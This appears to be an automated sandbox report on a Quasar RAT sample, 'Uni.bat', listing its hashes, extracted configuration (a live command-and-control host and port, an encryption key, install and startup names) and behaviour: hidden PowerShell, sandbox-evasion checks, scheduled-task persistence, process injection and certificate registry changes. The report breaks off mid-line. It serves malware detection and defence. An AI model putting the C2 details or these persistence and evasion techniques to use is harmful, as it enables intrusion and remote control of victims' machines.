Analysis
-
max time kernel
42s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
14-05-2024 23:36
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Uni.bat
Resource
win10v2004-20240426-en
General
-
Target
Uni.bat
-
Size
515KB
-
MD5
4c2a3be3d5c9464eb441677e41f44fd8
-
SHA1
c826034a0882d21a39056d745e88622ee9698343
-
SHA256
45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
-
SHA512
ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
-
SSDEEP
12288:OOCZeIh9XQFAbCbtqTUGLYPSow/QWEO2b:4zh9+3tZGEw/b2b
Malware Config
Extracted
quasar
3.1.5
SLAVE
review-tops.gl.at.ply.gg:48212
$Sxr-IGnkORFTlshRl7BdTw
-
encryption_key
YDmRBA8wExjQkYgGrHhN
-
install_name
$sxr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Discord
-
subdirectory
$77
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/3964-79-0x0000000006E80000-0x0000000006EEC000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2028 created 608 2028 powershell.EXE winlogon.exe -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 24 3964 powershell.exe 26 3964 powershell.exe 30 3964 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 2572 powershell.exe 3384 powershell.exe 3964 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
Processes:
$sxr-powershell.exeinstall.exepid process 548 $sxr-powershell.exe 1092 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 23 ip-api.com -
Drops file in System32 directory 8 IoCs
Processes:
svchost.exesvchost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2028 set thread context of 3984 2028 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
mousocoreworker.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
mousocoreworker.exewmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 49 IoCs
Processes:
mousocoreworker.exepowershell.EXEsvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE -
Modifies registry class 5 IoCs
Processes:
RuntimeBroker.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings powershell.exe -
Processes:
$sxr-powershell.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e $sxr-powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e $sxr-powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 $sxr-powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exe$sxr-powershell.exepowershell.EXEdllhost.exepid process 2572 powershell.exe 2572 powershell.exe 3384 powershell.exe 3384 powershell.exe 3964 powershell.exe 3964 powershell.exe 548 $sxr-powershell.exe 548 $sxr-powershell.exe 2028 powershell.EXE 2028 powershell.EXE 2028 powershell.EXE 2028 powershell.EXE 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe 3984 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeIncreaseQuotaPrivilege 3384 powershell.exe Token: SeSecurityPrivilege 3384 powershell.exe Token: SeTakeOwnershipPrivilege 3384 powershell.exe Token: SeLoadDriverPrivilege 3384 powershell.exe Token: SeSystemProfilePrivilege 3384 powershell.exe Token: SeSystemtimePrivilege 3384 powershell.exe Token: SeProfSingleProcessPrivilege 3384 powershell.exe Token: SeIncBasePriorityPrivilege 3384 powershell.exe Token: SeCreatePagefilePrivilege 3384 powershell.exe Token: SeBackupPrivilege 3384 powershell.exe Token: SeRestorePrivilege 3384 powershell.exe Token: SeShutdownPrivilege 3384 powershell.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeSystemEnvironmentPrivilege 3384 powershell.exe Token: SeRemoteShutdownPrivilege 3384 powershell.exe Token: SeUndockPrivilege 3384 powershell.exe Token: SeManageVolumePrivilege 3384 powershell.exe Token: 33 3384 powershell.exe Token: 34 3384 powershell.exe Token: 35 3384 powershell.exe Token: 36 3384 powershell.exe Token: SeIncreaseQuotaPrivilege 3384 powershell.exe Token: SeSecurityPrivilege 3384 powershell.exe Token: SeTakeOwnershipPrivilege 3384 powershell.exe Token: SeLoadDriverPrivilege 3384 powershell.exe Token: SeSystemProfilePrivilege 3384 powershell.exe Token: SeSystemtimePrivilege 3384 powershell.exe Token: SeProfSingleProcessPrivilege 3384 powershell.exe Token: SeIncBasePriorityPrivilege 3384 powershell.exe Token: SeCreatePagefilePrivilege 3384 powershell.exe Token: SeBackupPrivilege 3384 powershell.exe Token: SeRestorePrivilege 3384 powershell.exe Token: SeShutdownPrivilege 3384 powershell.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeSystemEnvironmentPrivilege 3384 powershell.exe Token: SeRemoteShutdownPrivilege 3384 powershell.exe Token: SeUndockPrivilege 3384 powershell.exe Token: SeManageVolumePrivilege 3384 powershell.exe Token: 33 3384 powershell.exe Token: 34 3384 powershell.exe Token: 35 3384 powershell.exe Token: 36 3384 powershell.exe Token: SeIncreaseQuotaPrivilege 3384 powershell.exe Token: SeSecurityPrivilege 3384 powershell.exe Token: SeTakeOwnershipPrivilege 3384 powershell.exe Token: SeLoadDriverPrivilege 3384 powershell.exe Token: SeSystemProfilePrivilege 3384 powershell.exe Token: SeSystemtimePrivilege 3384 powershell.exe Token: SeProfSingleProcessPrivilege 3384 powershell.exe Token: SeIncBasePriorityPrivilege 3384 powershell.exe Token: SeCreatePagefilePrivilege 3384 powershell.exe Token: SeBackupPrivilege 3384 powershell.exe Token: SeRestorePrivilege 3384 powershell.exe Token: SeShutdownPrivilege 3384 powershell.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeSystemEnvironmentPrivilege 3384 powershell.exe Token: SeRemoteShutdownPrivilege 3384 powershell.exe Token: SeUndockPrivilege 3384 powershell.exe Token: SeManageVolumePrivilege 3384 powershell.exe Token: 33 3384 powershell.exe Token: 34 3384 powershell.exe Token: 35 3384 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exepowershell.EXEdllhost.exedescription pid process target process PID 5008 wrote to memory of 2724 5008 cmd.exe net.exe PID 5008 wrote to memory of 2724 5008 cmd.exe net.exe PID 2724 wrote to memory of 3392 2724 net.exe net1.exe PID 2724 wrote to memory of 3392 2724 net.exe net1.exe PID 5008 wrote to memory of 2572 5008 cmd.exe powershell.exe PID 5008 wrote to memory of 2572 5008 cmd.exe powershell.exe PID 5008 wrote to memory of 2572 5008 cmd.exe powershell.exe PID 2572 wrote to memory of 3384 2572 powershell.exe powershell.exe PID 2572 wrote to memory of 3384 2572 powershell.exe powershell.exe PID 2572 wrote to memory of 3384 2572 powershell.exe powershell.exe PID 2572 wrote to memory of 4712 2572 powershell.exe WScript.exe PID 2572 wrote to memory of 4712 2572 powershell.exe WScript.exe PID 2572 wrote to memory of 4712 2572 powershell.exe WScript.exe PID 4712 wrote to memory of 2792 4712 WScript.exe cmd.exe PID 4712 wrote to memory of 2792 4712 WScript.exe cmd.exe PID 4712 wrote to memory of 2792 4712 WScript.exe cmd.exe PID 2792 wrote to memory of 2412 2792 cmd.exe net.exe PID 2792 wrote to memory of 2412 2792 cmd.exe net.exe PID 2792 wrote to memory of 2412 2792 cmd.exe net.exe PID 2412 wrote to memory of 3628 2412 net.exe net1.exe PID 2412 wrote to memory of 3628 2412 net.exe net1.exe PID 2412 wrote to memory of 3628 2412 net.exe net1.exe PID 2792 wrote to memory of 3964 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 3964 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 3964 2792 cmd.exe powershell.exe PID 3964 wrote to memory of 3920 3964 powershell.exe schtasks.exe PID 3964 wrote to memory of 3920 3964 powershell.exe schtasks.exe PID 3964 wrote to memory of 3920 3964 powershell.exe schtasks.exe PID 3964 wrote to memory of 548 3964 powershell.exe $sxr-powershell.exe PID 3964 wrote to memory of 548 3964 powershell.exe $sxr-powershell.exe PID 3964 wrote to memory of 548 3964 powershell.exe $sxr-powershell.exe PID 3964 wrote to memory of 1092 3964 powershell.exe install.exe PID 3964 wrote to memory 